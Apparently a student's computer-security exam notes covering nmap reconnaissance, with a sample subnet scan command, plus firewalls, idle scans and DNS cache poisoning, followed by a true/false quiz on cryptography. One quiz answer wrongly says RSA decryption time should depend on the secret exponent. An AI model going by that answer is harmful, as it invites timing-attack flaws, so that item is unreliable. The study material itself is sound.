more publicly routable IP addresses
WHOIS queries are a good way to find them which can be used to identify
blocks of IP addresses owned
After you identified target (range of) IPs you can:
Host discovery: narrow broad swath of potential IPs to ones that have hosts
associated with them
Service discovery: for a particular host, identify running services
OS fingerprinting: identify the OS software version running
Application fingerprinting: identify the high level software running at a higher
level (e.g. Apache version)
NMAP
Network mapping tool
The de-facto standard for network reconnaissance and testing with numerous built-in
scanning methods
TCP connect() Scan [-sT]
Default
Initiate proper TCP connection and see whether you can connect
SYN Stealth Scan [-sS]
Only send SYN packet, does not register as connection on other end

Service Detection [-sV]


Port Scan of Host [-Pn]
OS Fingerprinting [-O]
NMAP status messages
open: host is accepting connections on that port
closed: host responds to NMAP probes on port, but doesnt accept connections
filtered: host may be behind firewall or not up at all, means that NMAP couldnt
get packets through to host on that port
If a port says tcpwrapped then a full TCP handshake was completed but the remote
host closed the connection without receiving any data
nmap -Pn -sT -p 22 192.168.1.0/24
Tries all IPs, one by one
Firewall
Prevent outsiders to gain information about inner working of a network
Packet filtering
Decision to drop/allow is packet-based
Stateful filtering
Attempts to understand logic of the connection (e.g., FTP triggers connection to
higher port, that would normally be disallowed but FW would recognize this as
part of allowed FTP connection)
Requires keeping state
Vulnerable to DoS (similar to SYN floods)
Extreme example of this: Network-address translation (NAT)
Network behind the firewall uses dierent (non-public) IP range
Firewall keeps connection table
Network DMZ
DMZ (demilitarized zone) helps isolate public network components form private
network components
Firewall rules to disallow trac from Internet to internal services
Allow/deny rules based on src/dst (IPs + ports), protocol, etc.
Idle Scans
A TCP port scan method that consists of sending spoofed packets to a computer to
find out what services are available. This is accomplished by impersonating another
computer called a "zombie" (that is not transmitting or receiving information) and
observing the behavior of the ''zombie'' system
Main idea:
1. Determine IPID of a zombie via SYN/ACK
2. Send SYN spoofed from zombie
3. Determine new IPID of zombie via SYN/ACK

Can prevent a system form being a zombie by:


Random (instead of sequential) IPID's
Use intrusion-detection systems (IDS) to identify unwanted trac patterns
Two broad classes:
Anomaly detection: determine what normal trac looks like and flag
abnormal trac
Signature-based: define some explicit trac patterns as bad and flag
them
Miscellaneous
Given an RSA modulus N = P Q and a valid public exponent e, to encrypt a
message m ZN, we first choose a random r from ZN and the ciphertext as c =
(m r)e mod N. Is this a good idea?

Terrible idea because the random r completely hides the message. We can
recover m r given d but we have no means of removing the randomness r to
recover m
Is MAC(M) = SHA-256(M) XOR K a good idea?
(M,T) = (M, MAC(M)) = (M, SHA-256(M) XOR K)
Easy to recover K = T XOR SHA-256(M)
Is replacing password hashing with symmetric encryption a good idea?
No because if you find the secret key you get access to all the passwords
Explain how a DNS cache poisoning attack works
Attacker takes advantage of a DNS server using a predictable UDP port
You can flood the victim name server with forged answers, guessing the QID,
until one of them hits correct in which the victim is routed to a malicious site
FALSE: It is impossible to see the contents of a digital certificate without knowing the
CAs secret (signing) key
It is possible to see the contents of a digital certificate with the verification key
TRUE: Counter-mode encryption using AES is semantically secure, assuming AES is a
pseudorandom permutation/function
FALSE: Mono-alphabetic substitution ciphers are insecure under an unknown-plaintext
attack, but remain secure under known-plaintext attacks
Mono-alphabetic substitution ciphers are not secure under known-plaintext
attacks because you can still use frequency analysis to find the key
FALSE: Zero-day exploits can be found on the NVD webpage
It wouldnt be a zero-day exploit if it can be found on the NVD webpage, it is a
vulnerability that is unknown to the vendor
FALSE: DES is more secure than AES
The DES keyspace is too small so it is less secure than AES
TRUE: Counter-mode encryption never guarantees integrity
TRUE: EtM is a better solution than MtE
FALSE: Every TLS certificate is issued by a root certification authority
Certificates are issued by Issuing CAs
TRUE: Multi-factor authentication is preferable over single-factor authentication
TRUE: SHA-512 is much slower than MD5

FALSE: The IP protocol uses digital signatures to avoid spoofing


IP protocol has nothing to do with digital signatures, it uses upstream ingress
filtering to prevent spoofing
TRUE: TLS relies on both public- and secret-key cryptography
TRUE: If an encryption scheme is semantically secure, then the ciphertext length
cannot be equal to the plaintext length
TRUE: The running time of the RSA decryption algorithm should depend on the value
of the secret exponent d
TRUE: MD5 is faster than SHA-512
FALSE: Choosing a password longer than 6 characters is an overkill
6 character passwords are insanely easy to brute-force
FALSE: Marking memory pages as either writeable or executable completely resolves
control-flow hijacking attacks
Still susceptible to return-to-libc attacks
TRUE: Dynamic memory allocation typically occurs on the heap
FALSE: Using strncpy instead of strcpy completely prevents buer overflows
If the programmer chooses to copy strings bigger than buer size with strncpy
then buer overflows can still occur
FALSE: Cookies are problematic, because they are sent along with every HTTP request
made by the browser, no matter which host is being accessed
Cookies are scoped, not sent along with every HTTP request made by the
browser
TRUE: A block cipher with a 32-bit key is not secure
FALSE: UNIX primarily uses capabilities for access control
UNIX uses access control lists
FALSE: Zero-day vulnerabilities are assigned a CVE number as soon as they are
exploited for the first time
Impossible because vendor doesnt know about zero-day vulnerabilities
TRUE: CBC encryption using AES is semantically secure if AES is a pseudorandom
function (PRF)
TRUE: A 4096-bit RSA modulus is considered a safe choice given present day
factoring attacks
FALSE: A mono-alphabetic substitution cipher is semantically secure
Reveals lots of information about plaintext including frequency and whether it
was encrypted earlier
TRUE: Digital certificates help preventing man-in-the-middle attacks in TLS/SSL
FALSE: Setting ones password to an uncommon English word prevents password
cracking attacks as long as the word is longer than 12 letters
Doesnt prevent password cracking if badly hashed
FALSE: A Gmail password consistent of 6 randomly chosen letters can be recovered in
a few seconds in an online attack
Online attacks can be mitigated by limiting requests
FALSE: Any 25-character long password is suciently secure
Length by itself will never make your password suciently secure"
FALSE: Using CBC-mode encryption with DES provides a sucient security margin for
most applications
DES is not sucient, must use AES

TRUE: A mono-alphabetic substitution cipher should not be used for a secure


application
FALSE: The window of vulnerability starts as soon as a new patch for this vulnerability
has been released by the vendor
Window of vulnerability starts as soon as system is vulnerable
FALSE: AES is semantically secure
It is deterministic so it isnt semantically secure
TRUE: CBC-mode encryption never guarantees integrity
FALSE: A 512-bit RSA modulus is considered a safe choice given present day factoring
attacks
Should be around 4096-bit for modern day standards
TRUE: Certificates are the most important application of digital signatures
TRUE: In the Biba policy model, there is no flow of information from a lower to higher
security (integrity) level

Tools

Confidentiality

Integrity

Message authentication
code

Public-key certificate

Public-key encryption

Backup system

Password-based login

Mandatory access
control

An auxiliary power unit

Availability

Vous aimerez peut-être aussi